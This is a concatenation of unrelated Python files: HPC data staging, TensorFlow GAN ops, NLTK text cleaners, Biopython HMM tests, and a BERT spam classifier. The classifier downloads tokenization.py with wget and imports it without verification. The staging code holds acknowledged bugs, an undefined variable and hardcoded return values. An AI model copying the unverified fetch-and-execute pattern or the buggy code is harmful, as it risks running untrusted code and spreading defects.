                      Read {total_read:.2f} GB (bandwidth: {total_read / stage_duration:.2f} GB/s).
                      Write {total_write:.2f} GB (bandwidth: {total_write / stage_duration:.2f} GB/s).
                   """
            )
        # verify staging results if requested
        if verify:
            nvtx.range_push(f"stage_verify")
            if local_rank == 0:
                files = glob(os.path.join(stage_target_directory, os.path.basename(stage_filter)))
            else:
                files = []
            if not full_dataset_per_node:
                # if every node hosts a shard, we need to sum the results, if not we need to make sure everybody has the same
                files_full = instance_comm.allgather(files)
                files_full = set(itertools.chain(*files_full))
            else:
                files_full = set(files)
            num_files = len(files_full)
            # strip off the directory
            checkfiles1 = sorted([os.path.basename(x) for x in files_full])
            # NOTE(review): 'allfiles' is not defined anywhere in this function —
            # verify=True raises NameError. TODO confirm where the expected file
            # list should come from (likely the staging helper's return value).
            checkfiles2 = sorted([os.path.basename(x) for x in allfiles])
            assert (num_files == file_stats[stage_filter])
            assert (checkfiles1 == checkfiles2)
            if irank == 0:
                print(
                    f"Staged data for {stage_filter}: {num_files}, expected: {file_stats[stage_filter]}",
                    flush=True
                )
            nvtx.range_pop()
        # close range
        nvtx.range_pop()
    return 121266, 15158
def stage_instance_data_nvme_instance_ranks(
    global_comm, instance_comm, hdf5file, dataset, target_directory, instance_id, touch=False
):
    """Stage one HDF5 dataset shard: split across instance ranks, then across instances.

    The samples are first partitioned evenly over the ranks of an instance; the
    slice owned by this instance rank is then subdivided over the instances
    working on the same data, and only the piece belonging to ``instance_id``
    is written out as individual ``.npy`` files (or empty touched files).

    Returns (0, 0) — read/write byte counters are not tracked here.
    """
    world_size = global_comm.Get_size()
    inst_size = instance_comm.Get_size()
    inst_rank = instance_comm.Get_rank()
    h5f = h5py.File(hdf5file, "r")
    ds = h5f.get(dataset)
    total = ds.shape[0]
    # num_files = 100
    # shard range within the instance =========================
    # one shard per instance rank; the first (total % inst_size)
    # shards take one extra sample so everything is covered
    base, extra = divmod(total, inst_size)
    bounds = [0]
    for shard in range(1, inst_size):
        bounds.append(bounds[-1] + base + (1 if shard - 1 < extra else 0))
    bounds.append(total)
    lo, hi = bounds[inst_rank], bounds[inst_rank + 1]
    # split that slice again across the instances sharing the same data:
    # st ----i0-------i1-------i2-------i3--------i4------i5----- sp
    num_instances = world_size // inst_size
    step = (hi - lo) // num_instances
    cuts = [lo + k * step for k in range(num_instances)] + [hi]
    lo, hi = cuts[instance_id], cuts[instance_id + 1]
    # =========================================================
    prefix = "label" if dataset == "labels" else dataset
    staged = []
    pos = lo
    while True:
        stop = min(hi, pos + 16)
        block = ds[pos:stop]
        for k in range(block.shape[0]):
            outputfile = prefix + "-" + "{:06}".format(pos + k) + ".npy"
            if touch:
                subprocess.run(['touch', str(os.path.join(target_directory, outputfile))])
            else:
                np.save(os.path.join(target_directory, outputfile), block[k])
            staged.append(outputfile)
        if stop == hi:
            break
        pos = stop
    return 0, 0
|
<reponame>IntuitionMachine/cppn-gan-vae-tensorflow
import math
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import ops
#from utils import *
class batch_norm(object):
    """Batch-normalization layer for 4-D (NHWC) tensors.

    Code modification of http://stackoverflow.com/a/33950177.
    gamma (scale) and beta (offset) variables are created on first __call__
    inside the scope given by ``name``.
    """
    def __init__(self, batch_size, epsilon=1e-5, momentum = 0.1, name="batch_norm"):
        # batch_size is stored but not read by __call__ below
        with tf.variable_scope(name) as scope:
            self.epsilon = epsilon
            self.momentum = momentum
            self.batch_size = batch_size
            # NOTE(review): this EMA is created but never applied or updated
            # anywhere in this class, so inference always uses per-batch
            # statistics — confirm this is intended.
            self.ema = tf.train.ExponentialMovingAverage(decay=self.momentum)
            self.name=name
    def __call__(self, x, train=True):
        # NOTE(review): `train` is ignored; moments are always recomputed from x.
        shape = x.get_shape().as_list()
        with tf.variable_scope(self.name) as scope:
            self.gamma = tf.get_variable("gamma", [shape[-1]],
                                initializer=tf.random_normal_initializer(1., 0.02))
            self.beta = tf.get_variable("beta", [shape[-1]],
                                initializer=tf.constant_initializer(0.))
            # moments over batch, height and width -> per-channel statistics
            self.mean, self.variance = tf.nn.moments(x, [0, 1, 2])
            return tf.nn.batch_norm_with_global_normalization(
                x, self.mean, self.variance, self.beta, self.gamma, self.epsilon,
                scale_after_normalization=True)
def binary_cross_entropy_with_logits(logits, targets, name=None):
    """Computes a mean binary cross entropy between `logits` and `targets`.

    For brevity, let `x = logits`, `z = targets`. The value computed here is

        loss(x, z) = - mean_i (x[i] * log(z[i] + eps) + (1 - x[i]) * log(1 - z[i] + eps))

    NOTE(review): despite the name, no sigmoid is applied and the log is taken
    of `targets` — in practice callers pass predicted probabilities as
    `targets` and the 0/1 labels as `logits`. Confirm against call sites before
    changing argument order.

    Args:
        logits: A `Tensor` of type `float32` or `float64`.
        targets: A `Tensor` of the same type and shape as `logits`.
    """
    eps = 1e-12  # keeps log() finite when a probability is exactly 0 or 1
    with ops.op_scope([logits, targets], name, "bce_loss") as name:
        logits = ops.convert_to_tensor(logits, name="logits")
        targets = ops.convert_to_tensor(targets, name="targets")
        return tf.reduce_mean(-(logits * tf.log(targets + eps) +
                              (1. - logits) * tf.log(1. - targets + eps)))
def conv_cond_concat(x, y):
    """Concatenate conditioning vector y onto x along the channel (4th) axis."""
    x_shape = x.get_shape()
    y_shape = y.get_shape()
    # broadcast y over the spatial dimensions of x before concatenating
    tiled_y = y * tf.ones([x_shape[0], x_shape[1], x_shape[2], y_shape[3]])
    return tf.concat(3, [x, tiled_y])
def conv2d(input_, output_dim,
           k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,
           name="conv2d"):
    """SAME-padded strided 2-D convolution with truncated-normal kernel and zero bias."""
    with tf.variable_scope(name):
        in_channels = input_.get_shape()[-1]
        kernel = tf.get_variable('w', [k_h, k_w, in_channels, output_dim],
                                 initializer=tf.truncated_normal_initializer(stddev=stddev))
        convolved = tf.nn.conv2d(input_, kernel, strides=[1, d_h, d_w, 1], padding='SAME')
        bias = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))
        # reshape restores the static shape after bias_add
        return tf.reshape(tf.nn.bias_add(convolved, bias), convolved.get_shape())
def deconv2d(input_, output_shape,
             k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,
             name="deconv2d", with_w=False):
    """Strided transposed convolution ("deconvolution").

    Args:
        input_: 4-D input tensor (NHWC).
        output_shape: full static output shape, e.g. [batch, h, w, channels].
        k_h, k_w: kernel height/width.
        d_h, d_w: strides along height/width.
        stddev: stddev of the random-normal kernel initializer.
        name: variable scope name.
        with_w: when True, also return the kernel and bias variables.

    Returns:
        The deconvolved tensor, or (tensor, w, biases) when with_w is True.
    """
    with tf.variable_scope(name):
        # filter : [height, width, output_channels, in_channels]
        # BUG FIX: the width dimension previously used k_h, silently ignoring k_w
        # (harmless only for the default square kernel).
        w = tf.get_variable('w', [k_h, k_w, output_shape[-1], input_.get_shape()[-1]],
                            initializer=tf.random_normal_initializer(stddev=stddev))
        deconv = tf.nn.deconv2d(input_, w, output_shape=output_shape,
                                strides=[1, d_h, d_w, 1])
        biases = tf.get_variable('biases', [output_shape[-1]], initializer=tf.constant_initializer(0.0))
        deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())
        if with_w:
            return deconv, w, biases
        else:
            return deconv
def lrelu(x, leak=0.2, name="lrelu"):
    """Leaky ReLU: x for x > 0, leak * x otherwise, written branch-free."""
    with tf.variable_scope(name):
        # 0.5*(1+leak)*x + 0.5*(1-leak)*|x|  ==  max(x, leak*x)
        return 0.5 * (1 + leak) * x + 0.5 * (1 - leak) * abs(x)
def linear(input_, output_size, scope=None, stddev=0.02, bias_start=0.0, with_w=False):
    """Affine transform input_ @ W + b; optionally also return W and b."""
    in_dim = input_.get_shape().as_list()[1]
    with tf.variable_scope(scope or "Linear"):
        matrix = tf.get_variable("Matrix", [in_dim, output_size], tf.float32,
                                 tf.random_normal_initializer(stddev=stddev))
        bias = tf.get_variable("bias", [output_size],
                               initializer=tf.constant_initializer(bias_start))
        output = tf.matmul(input_, matrix) + bias
        return (output, matrix, bias) if with_w else output
def fully_connected(input_, output_size, scope=None, stddev=0.1, with_bias = True):
    """Linear projection with an optional randomly-initialized (broadcast) bias."""
    batch_dim, in_dim = input_.get_shape().as_list()
    with tf.variable_scope(scope or "FC"):
        weights = tf.get_variable("Matrix", [in_dim, output_size], tf.float32,
                                  tf.random_normal_initializer(stddev=stddev))
        projected = tf.matmul(input_, weights)
        if not with_bias:
            return projected
        bias = tf.get_variable("bias", [1, output_size],
                               initializer=tf.random_normal_initializer(stddev=stddev))
        # broadcast the [1, output_size] bias over the batch dimension
        return projected + bias * tf.ones([batch_dim, 1], dtype=tf.float32)
|
import re, string
from nltk.stem.snowball import SnowballStemmer
from nltk.tokenize import word_tokenize
class Cleaners(object):
    """Collection of text-cleaning methods: stopword handling, stemming,
    tokenizing, punctuation/whitespace/regex normalization."""
    def __init__(self, stopwords=None):
        """Initialize with stopwords as a list, a filename to load them from, or None."""
        if isinstance(stopwords, list):
            self.stopwords = stopwords
        elif isinstance(stopwords, str):
            self._load_stopwords(stopwords)
        else:
            self.stopwords = None
    def _load_stopwords(self, filename):
        """Load comma-separated stopwords from file into self.stopwords as a clean list."""
        with open(filename) as file:
            lines = file.readlines()
        stopwords_list = []
        for line in lines:
            stopwords_list.extend(line.strip().split(','))
        # remove duplicates
        stopwords_list = list(set(stopwords_list))
        # drop empty entries defensively: list.remove raises ValueError when
        # '' is absent (e.g. a file with no trailing commas)
        if '' in stopwords_list:
            stopwords_list.remove('')
        self.stopwords = [stopword.strip() for stopword in stopwords_list]
    def stem(self, text, lang, as_list=True):
        """stems text using snowball stemmer from nltk
        Parameters
        ----------
        text : string/list of strings of text to be stemmed
        lang: string, language in which text is
        as_list : boolean, return result as list of stemmed tokens (True) or as one joined string?
        Returns
        -------
        list of strings (or single string) of stemmed text
        """
        stemmer = SnowballStemmer(lang)
        if not isinstance(text, list):
            text = text.split(' ')
        stemmed_text = [stemmer.stem(word) for word in text]
        if as_list:
            return stemmed_text
        return ' '.join(stemmed_text)
    def tokenize(self, texts):
        """tokenize text using nltk
        Parameters
        ----------
        texts : string of text to be tokenized, or list of rows
        Returns
        -------
        list of strings (tokens)"""
        # nltk tokenizer
        if isinstance(texts, list):
            # NOTE: each list element is expected to be a sequence whose first
            # item holds the text (e.g. a one-column row) — confirm with callers
            return [word_tokenize(text[0]) for text in texts]
        return word_tokenize(texts)
    def remove_stopwords(self, tokens, stopwords=None, return_string=False, min_len_tokens_kept=3):
        """remove stopwords from token list
        Parameters
        ----------
        tokens : list of tokens where stopwords are to be removed
        stopwords: list of stopwords. If this is None, takes default stopwords
        return_string: instead of list return string
        min_len_tokens_kept: minimum length of tokens kept
        Returns
        -------
        list/string of tokens without stopwords"""
        if stopwords is None:
            stopwords = self.stopwords
        result = [token for token in tokens if token not in stopwords and len(token) >= min_len_tokens_kept]
        if return_string:
            return ' '.join(result)
        return result
    def lower_text(self, text):
        """lowercase text
        Parameters
        ----------
        text : string of text to be turned lowercase
        Returns
        -------
        string of text in lowercase"""
        return text.lower()
    def remove_punctuation(self, text, custom_punctutation=None, replace_with=" "):
        """remove punctuation from text
        Parameters
        ----------
        text : string of text where punctuation is to be removed
        custom_punctutation: string of custom punctuation to remove in addition.
            If None only default punctuation is removed
        replace_with: string with what punctuation is replaced
        Returns
        -------
        string of text without punctuation"""
        punctuation = string.punctuation
        if custom_punctutation is not None:
            punctuation = punctuation + custom_punctutation
        return "".join(char if char not in punctuation else replace_with for char in text)
    def remove_excess_spaces(self, text):
        """removes excess spaces if more than one is in a row:
        tere   olen -> tere olen
        Parameters
        ----------
        text : string of text where excess spaces are to be removed
        Returns
        -------
        string of text without excess spaces
        """
        return re.sub(' +', ' ', text)
    def replace_regex_pattern(self, pattern, text, replace=" ", escape_regex=False):
        """replaces regex pattern in text with replace
        Parameters
        ----------
        text : string/list of strings in which the pattern is replaced
        pattern: regex pattern which is replaced
        replace: string with what pattern is to be replaced
        escape_regex: escape regex pattern and evaluate it literally
        Returns
        -------
        string of text (or list of strings if input was list of strings) with regex pattern replaced
        """
        if escape_regex:
            regex_pattern = re.escape(pattern)
        else:
            regex_pattern = re.compile(pattern)
        if isinstance(text, list):
            return [re.sub(regex_pattern, replace, str(el)) for el in text]
        return re.sub(regex_pattern, replace, str(text))
    def replace_string_from_list(self, text, string_list, replace=' '):
        """replaces each string of string_list occurring in text with replace
        Parameters
        ----------
        text : string/list-like coerced to string in which replacements happen
        string_list: list of strings to be replaced
        replace: string with what each occurrence is replaced
        Returns
        -------
        string of text where strings from string_list are replaced
        """
        text = str(text)
        for strng in string_list:
            text = text.replace(strng, replace)
        return text
|
<reponame>yangwu91/biopython
#!/usr/bin/env python
"""Test the HMM.MarkovModel and HMM.DynamicProgramming modules.
Also tests Training methods.
"""
# standard modules
from __future__ import print_function
import unittest
import math
# biopython
from Bio import Alphabet
from Bio.Seq import Seq
# stuff we are testing
from Bio.HMM import MarkovModel
from Bio.HMM import DynamicProgramming
from Bio.HMM import Trainer
# create some simple alphabets
class NumberAlphabet(Alphabet.Alphabet):
    """Numbers as the (hidden) states of the model.
    """
    # the two hidden-state symbols used throughout these tests
    letters = ['1', '2']
class LetterAlphabet(Alphabet.Alphabet):
    """Letters as the (observable) emissions of the model.
    """
    # the two emission symbols used throughout these tests
    letters = ['A', 'B']
# -- helper functions
def test_assertion(name, result, expected):
"""Helper function to test an assertion and print out a reasonable error.
"""
assert result == expected, "Expected %s, got %s for %s" \
% (expected, result, name)
class TrainingSequenceTest(unittest.TestCase):
    """Construction rules for Trainer.TrainingSequence (emission vs. state lengths)."""
    def test_empty_state_training_sequence(self):
        # an empty state path is allowed (unlabelled training data)
        emission_seq = Seq('AB', LetterAlphabet())
        state_seq = Seq('', NumberAlphabet())
        training_seq = Trainer.TrainingSequence(emission_seq, state_seq)
        assert training_seq.emissions == emission_seq
        assert training_seq.states == state_seq
    def test_valid_training_sequence(self):
        # matching lengths: one state per emission
        emission_seq = Seq('AB', LetterAlphabet())
        state_seq = Seq('12', NumberAlphabet())
        training_seq = Trainer.TrainingSequence(emission_seq, state_seq)
        assert training_seq.emissions == emission_seq
        assert training_seq.states == state_seq
    def test_invalid_training_sequence(self):
        # mismatched non-empty lengths must be rejected
        emission_seq = Seq('AB', LetterAlphabet())
        state_seq = Seq('1', NumberAlphabet())
        with self.assertRaises(ValueError):
            Trainer.TrainingSequence(emission_seq, state_seq)
class MarkovModelBuilderTest(unittest.TestCase):
    """Tests for MarkovModel.MarkovModelBuilder setup and probability helpers."""
    def setUp(self):
        # builder over the 2-state ('1','2') / 2-emission ('A','B') alphabets
        self.mm_builder = MarkovModel.MarkovModelBuilder(NumberAlphabet(),
                                                         LetterAlphabet())
    def test_test_initialize(self):
        """Making sure MarkovModelBuilder is initialized correctly.
        """
        expected_transition_prob = {}
        expected_transition_pseudo = {}
        expected_emission_prob = {('2', 'A'): 0, ('1', 'A'): 0,
                                  ('1', 'B'): 0, ('2', 'B'): 0}
        expected_emission_pseudo = {('2', 'A'): 1, ('1', 'A'): 1,
                                    ('1', 'B'): 1, ('2', 'B'): 1}
        # (removed an unused `assertions = []` local that was never referenced)
        test_assertion("Transition prob", self.mm_builder.transition_prob,
                       expected_transition_prob)
        test_assertion("Transition pseudo",
                       self.mm_builder.transition_pseudo,
                       expected_transition_pseudo)
        test_assertion("Emission prob", self.mm_builder.emission_prob,
                       expected_emission_prob)
        test_assertion("Emission pseudo", self.mm_builder.emission_pseudo,
                       expected_emission_pseudo)
    def test_allow_all_transitions(self):
        """Testing allow_all_transitions.
        """
        self.mm_builder.allow_all_transitions()
        expected_prob = {('2', '1'): 0, ('1', '1'): 0,
                         ('1', '2'): 0, ('2', '2'): 0}
        expected_pseudo = {('2', '1'): 1, ('1', '1'): 1,
                           ('1', '2'): 1, ('2', '2'): 1}
        test_assertion("Probabilities", self.mm_builder.transition_prob,
                       expected_prob)
        test_assertion("Pseudo counts", self.mm_builder.transition_pseudo,
                       expected_pseudo)
    def test_set_initial_probabilities(self):
        # empty dict -> uniform distribution over states
        self.mm_builder.set_initial_probabilities({})
        test_assertion("Equal initial probabilities by default",
                       self.mm_builder.initial_prob, {'1': 0.5, '2': 0.5})
        # initial probability sum > 1, should raise an exception
        self.assertRaises(
            Exception,
            self.mm_builder.set_initial_probabilities,
            {'1': 0.6, '2': 0.5})
        # referencing invalid states should raise an exception
        self.assertRaises(
            Exception,
            self.mm_builder.set_initial_probabilities,
            {'666': 0.1})
        # partially specified: remainder is distributed to the other state
        self.mm_builder.set_initial_probabilities({'1': 0.2})
        test_assertion("One default initial probability",
                       self.mm_builder.initial_prob, {'1': 0.2, '2': 0.8})
        self.mm_builder.set_initial_probabilities({'1': 0.9, '2': 0.1})
        test_assertion("Set initial probabilities",
                       self.mm_builder.initial_prob, {'1': 0.9, '2': 0.1})
    def test_set_equal_probabilities(self):
        self.mm_builder.allow_transition('1', '2', 0.05)
        self.mm_builder.allow_transition('2', '1', 0.95)
        # overwrites the probabilities above with uniform values
        self.mm_builder.set_equal_probabilities()
        test_assertion("Equal initial probabilities",
                       self.mm_builder.initial_prob,
                       {'1': 0.5, '2': 0.5})
        test_assertion("Equal transition probabilities",
                       self.mm_builder.transition_prob,
                       {('1', '2'): 0.5, ('2', '1'): 0.5})
        test_assertion("Equal emission probabilities",
                       self.mm_builder.emission_prob,
                       {('2', 'A'): 0.25, ('1', 'B'): 0.25,
                        ('1', 'A'): 0.25, ('2', 'B'): 0.25})
    def test_set_random_probabilities(self):
        self.mm_builder.allow_transition('1', '2', 0.05)
        self.mm_builder.allow_transition('2', '1', 0.95)
        self.mm_builder.set_random_probabilities()
        # only the sizes are deterministic here, so that's all we can assert
        test_assertion("Number of initial probabilities",
                       len(self.mm_builder.initial_prob),
                       len(self.mm_builder._state_alphabet.letters))
        # To test this more thoroughly, perhaps mock random.random() and
        # verify that it's being called as expected?
class HiddenMarkovModelTest(unittest.TestCase):
    """Tests for HiddenMarkovModel transition queries and Viterbi decoding."""
    def setUp(self):
        # fresh 2-state / 2-emission builder for every test
        self.mm_builder = MarkovModel.MarkovModelBuilder(NumberAlphabet(),
                                                         LetterAlphabet())
    def test_transitions_from(self):
        """Testing the calculation of transitions_from
        """
        self.mm_builder.allow_transition('1', '2', 1.0)
        self.mm_builder.allow_transition('2', '1', 0.5)
        self.mm_builder.allow_transition('2', '2', 0.5)
        self.mm_builder.set_initial_probabilities({})
        self.mm = self.mm_builder.get_markov_model()
        state_1 = self.mm.transitions_from("1")
        expected_state_1 = ["2"]
        state_1.sort()
        expected_state_1.sort()
        test_assertion("States reached by transitions from state 1",
                       state_1, expected_state_1)
        state_2 = self.mm.transitions_from("2")
        expected_state_2 = ["1", "2"]
        state_2.sort()
        expected_state_2.sort()
        test_assertion("States reached by transitions from state 2",
                       state_2, expected_state_2)
        # unknown states yield an empty transition list, not an error
        fake_state = self.mm.transitions_from("Fake")
        expected_fake_state = []
        test_assertion("States reached by transitions from a fake transition",
                       fake_state, expected_fake_state)
    def test_transitions_to(self):
        """Testing the calculation of transitions_to
        """
        self.mm_builder.allow_transition('1', '1', 0.5)
        self.mm_builder.allow_transition('1', '2', 0.5)
        self.mm_builder.allow_transition('2', '1', 1.0)
        self.mm_builder.set_initial_probabilities({})
        self.mm = self.mm_builder.get_markov_model()
        state_1 = self.mm.transitions_to("1")
        expected_state_1 = ["1", "2"]
        state_1.sort()
        expected_state_1.sort()
        test_assertion("States with transitions to state 1",
                       state_1, expected_state_1)
        state_2 = self.mm.transitions_to("2")
        expected_state_2 = ["1"]
        state_2.sort()
        expected_state_2.sort()
        test_assertion("States with transitions to state 2",
                       state_2, expected_state_2)
        # unknown states yield an empty transition list, not an error
        fake_state = self.mm.transitions_to("Fake")
        expected_fake_state = []
        test_assertion("States with transitions to a fake transition",
                       fake_state, expected_fake_state)
    def test_allow_transition(self):
        """Testing allow_transition
        """
        # a single 1 -> 2 transition; check both directions of the query API
        self.mm_builder.allow_transition('1', '2', 1.0)
        self.mm_builder.set_initial_probabilities({})
        self.mm = self.mm_builder.get_markov_model()
        state_1 = self.mm.transitions_from("1")
        expected_state_1 = ["2"]
        state_1.sort()
        expected_state_1.sort()
        test_assertion("States reached by transitions from state 1",
                       state_1, expected_state_1)
        state_2 = self.mm.transitions_from("2")
        expected_state_2 = []
        state_2.sort()
        expected_state_2.sort()
        test_assertion("States reached by transitions from state 2",
                       state_2, expected_state_2)
        state_1 = self.mm.transitions_to("1")
        expected_state_1 = []
        state_1.sort()
        expected_state_1.sort()
        test_assertion("States with transitions to state 1",
                       state_1, expected_state_1)
        state_2 = self.mm.transitions_to("2")
        expected_state_2 = ["1"]
        state_2.sort()
        expected_state_2.sort()
        test_assertion("States with transitions to state 2",
                       state_2, expected_state_2)
    def test_simple_hmm(self):
        """Test a simple model with 2 states and 2 symbols.
        """
        # set initial probabilities
        prob_initial = [0.4, 0.6]
        self.mm_builder.set_initial_probabilities(
            {'1': prob_initial[0], '2': prob_initial[1]})
        # set transition probabilities
        prob_transition = [[0.35, 0.65], [0.45, 0.55]]
        self.mm_builder.allow_transition('1', '1', prob_transition[0][0])
        self.mm_builder.allow_transition('1', '2', prob_transition[0][1])
        self.mm_builder.allow_transition('2', '1', prob_transition[1][0])
        self.mm_builder.allow_transition('2', '2', prob_transition[1][1])
        # set emission probabilities
        prob_emission = [[0.45, 0.55], [0.75, 0.25]]
        self.mm_builder.set_emission_score('1', 'A', prob_emission[0][0])
        self.mm_builder.set_emission_score('1', 'B', prob_emission[0][1])
        self.mm_builder.set_emission_score('2', 'A', prob_emission[1][0])
        self.mm_builder.set_emission_score('2', 'B', prob_emission[1][1])
        # Check all two letter sequences using a brute force calculation
        model = self.mm_builder.get_markov_model()
        for first_letter in LetterAlphabet.letters:
            for second_letter in LetterAlphabet.letters:
                observed_emissions = [first_letter, second_letter]
                viterbi = model.viterbi(observed_emissions, NumberAlphabet)
                self._checkSimpleHmm(prob_initial, prob_transition,
                                     prob_emission, viterbi, observed_emissions)
    def _checkSimpleHmm(self, prob_initial, prob_transition, prob_emission,
                        viterbi, observed_emissions):
        # Brute-force search over all 4 two-state paths for the most probable
        # one, then compare against the Viterbi result (which is in log space).
        max_prob = 0
        # expected first and second states in the sequence, calculated below
        seq_first_state = None
        seq_second_state = None
        # convert the observed letters 'A' or 'B' into 0 or 1
        letter1 = ord(observed_emissions[0]) - ord('A')
        letter2 = ord(observed_emissions[1]) - ord('A')
        for first_state in NumberAlphabet.letters:
            for second_state in NumberAlphabet.letters:
                # compute the probability of the state sequence first_state,
                # second_state emitting the observed_emissions
                state1 = ord(first_state) - ord('1')
                state2 = ord(second_state) - ord('1')
                prob = prob_initial[state1] * prob_emission[state1][letter1] *\
                    prob_transition[state1][state2] *\
                    prob_emission[state2][letter2]
                if prob > max_prob:
                    seq_first_state = first_state
                    seq_second_state = second_state
                    max_prob = prob
        max_prob = math.log(max_prob)
        seq = viterbi[0]
        prob = viterbi[1]
        test_assertion("state sequence",
                       str(seq),
                       seq_first_state + seq_second_state)
        # rounding guards against float noise between the two computations
        test_assertion("log probability", round(prob, 11), round(max_prob, 11))
    def test_non_ergodic(self):
        """Non-ergodic model (meaning that some transitions are not allowed)."""
        # make state '1' the initial state
        prob_1_initial = 1.0
        self.mm_builder.set_initial_probabilities(
            {'1': prob_1_initial})
        # probabilities of transitioning from state 1 to 1, and 1 to 2
        prob_1_to_1 = 0.5
        prob_1_to_2 = 0.5
        # set up allowed transitions
        self.mm_builder.allow_transition('1', '1', prob_1_to_1)
        self.mm_builder.allow_transition('1', '2', prob_1_to_2)
        # Emission probabilities
        # In state 1 the most likely emission is A, in state 2 the most
        # likely emission is B. (Would be simpler just to use 1.0 and 0.0
        # emission probabilities here, but the algorithm blows up on zero
        # probabilities because of the conversion to log space.)
        prob_1_A = 0.95
        prob_1_B = 0.05
        prob_2_A = 0.05
        prob_2_B = 0.95
        # set emission probabilities
        self.mm_builder.set_emission_score('1', 'A', prob_1_A)
        self.mm_builder.set_emission_score('1', 'B', prob_1_B)
        self.mm_builder.set_emission_score('2', 'A', prob_2_A)
        self.mm_builder.set_emission_score('2', 'B', prob_2_B)
        # run the Viterbi algorithm to find the most probable state path
        model = self.mm_builder.get_markov_model()
        observed_emissions = ['A', 'B']
        viterbi = model.viterbi(observed_emissions, NumberAlphabet)
        seq = viterbi[0]
        prob = viterbi[1]
        # the most probable path must be from state 1 to state 2
        test_assertion("most probable path", str(seq), '12')
        # The probability of that path is the probability of starting in
        # state 1, then emitting an A, then transitioning 1 -> 2, then
        # emitting a B.
        # Note that probabilities are converted into log space.
        expected_prob = math.log(prob_1_initial)\
            + math.log(prob_1_A)\
            + math.log(prob_1_to_2)\
            + math.log(prob_2_B)
        test_assertion("log probability of most probable path",
                       prob, expected_prob)
class ScaledDPAlgorithmsTest(unittest.TestCase):
    """Smoke test for DynamicProgramming.ScaledDPAlgorithms scaling factors."""
    def setUp(self):
        # set up our Markov Model
        mm_builder = MarkovModel.MarkovModelBuilder(NumberAlphabet(),
                                                    LetterAlphabet())
        mm_builder.allow_all_transitions()
        mm_builder.set_equal_probabilities()
        mm = mm_builder.get_markov_model()
        # now set up a test sequence
        emission_seq = Seq("ABB", LetterAlphabet())
        state_seq = Seq("", NumberAlphabet())
        training_seq = Trainer.TrainingSequence(emission_seq, state_seq)
        # finally set up the DP
        self.dp = DynamicProgramming.ScaledDPAlgorithms(mm, training_seq)
    def test_calculate_s_value(self):
        """Testing the calculation of s values.
        """
        previous_vars = {('1', 0): .5,
                         ('2', 0): .7}
        # NOTE(review): the result is never asserted — this only checks the
        # call completes without raising. TODO add an expected-value assertion.
        s_value = self.dp._calculate_s_value(1, previous_vars)
class AbstractTrainerTest(unittest.TestCase):
    """Tests for Trainer.AbstractTrainer's estimation and likelihood helpers."""
    def setUp(self):
        # set up a bogus HMM and our trainer; the trainer methods under test
        # do not touch the model's (empty) tables
        hmm = MarkovModel.HiddenMarkovModel({}, {}, {}, {}, {})
        self.test_trainer = Trainer.AbstractTrainer(hmm)
    def test_ml_estimator(self):
        """Test the maximum likelihood estimator for simple cases.
        """
        # set up a simple dictionary of (from, to) transition counts
        counts = {('A', 'A'): 10,
                  ('A', 'B'): 20,
                  ('A', 'C'): 15,
                  ('B', 'B'): 5,
                  ('C', 'A'): 15,
                  ('C', 'C'): 10}
        results = self.test_trainer.ml_estimator(counts)
        # now make sure we are getting back the right thing:
        # each count normalized by the total count of its first element
        result_tests = []
        result_tests.append([('A', 'A'), float(10) / float(45)])
        result_tests.append([('A', 'B'), float(20) / float(45)])
        result_tests.append([('A', 'C'), float(15) / float(45)])
        result_tests.append([('B', 'B'), float(5) / float(5)])
        result_tests.append([('C', 'A'), float(15) / float(25)])
        result_tests.append([('C', 'C'), float(10) / float(25)])
        for test_result in result_tests:
            assert results[test_result[0]] == test_result[1], \
                "Got %f, expected %f for %s" % (results[test_result[0]],
                                                test_result[1],
                                                test_result[0])
    def test_log_likelihood(self):
        """Calculate log likelihood.
        """
        probs = [.25, .13, .12, .17]
        log_prob = self.test_trainer.log_likelihood(probs)
        # expected value is sum(log(p)) of the probabilities above
        expected_log_prob = -7.31873556778
        assert abs(expected_log_prob - log_prob) < 0.1, \
            "Bad probability calculated: %s" % log_prob
# run the tests
if __name__ == "__main__":
    # verbose per-test output from the standard text runner
    unittest.main(testRunner=unittest.TextTestRunner(verbosity=2))
|
import os
import numpy as np
import pandas as pd
import seaborn as sb
import tensorflow as tf
import tensorflow_hub as hub
import sklearn.metrics
import sklearn.model_selection
from absl import logging
logging.set_verbosity(logging.INFO)
# !pip install sentencepiece
# in case there is no such file in local path
if not os.path.exists('tokenization.py'):
os.system('wget --quiet https://raw.githubusercontent.com/tensorflow/models/master/official/nlp/bert/tokenization.py')
import tokenization
class OverwriteLog():
    """Print-based stand-in for absl logging (Kaggle kernels swallow absl output)."""
    # overwrite logging for kaggle kernel
    def info(self, msg):
        # mirror logging.info() by writing the message to stdout
        print(msg)
# shadow the absl `logging` imported above with the print-based replacement
logging = OverwriteLog()
def load_data():
    """Read the Kaggle SMS spam CSV and add `text`/`target` columns.

    `target` is 1 for spam rows, 0 for ham.
    """
    csv = '../input/sms-spam-collection-dataset/spam.csv'
    frame = pd.read_csv(csv, encoding = 'Windows-1252')
    # v2 holds the message body, v1 the ham/spam label
    frame['text'] = frame.v2
    frame['target'] = (frame.v1 == 'spam').astype(int)
    return frame
def get_bert_layer():
    """Download the uncased BERT-base encoder from TF Hub as a trainable Keras layer."""
    # BERT-large alternative (slower, more memory):
    # https://tfhub.dev/tensorflow/bert_en_uncased_L-24_H-1024_A-16/1
    # (the previous code assigned it first and immediately overwrote it — dead store)
    module_url = 'https://tfhub.dev/tensorflow/bert_en_uncased_L-12_H-768_A-12/2'
    return hub.KerasLayer(module_url, trainable=True)
def get_tokenizer(bert_layer):
    """Build a FullTokenizer from the vocab file and casing flag bundled with the hub layer."""
    vocab_file = bert_layer.resolved_object.vocab_file.asset_path.numpy()
    do_lower_case = bert_layer.resolved_object.do_lower_case.numpy()
    return tokenization.FullTokenizer(vocab_file, do_lower_case)
def bert_encode(texts, tokenizer, max_len=512):
    """Tokenize texts into fixed-length (token-id, mask, segment-id) arrays for BERT.

    Each text is truncated to max_len - 2 tokens, wrapped in [CLS]/[SEP],
    zero-padded to max_len, and paired with a matching attention mask.
    All inputs belong to segment 0.
    """
    all_ids, all_masks, all_segments = [], [], []
    for raw in texts:
        pieces = tokenizer.tokenize(raw)[:max_len - 2]
        sequence = ["[CLS]"] + pieces + ["[SEP]"]
        padding = max_len - len(sequence)
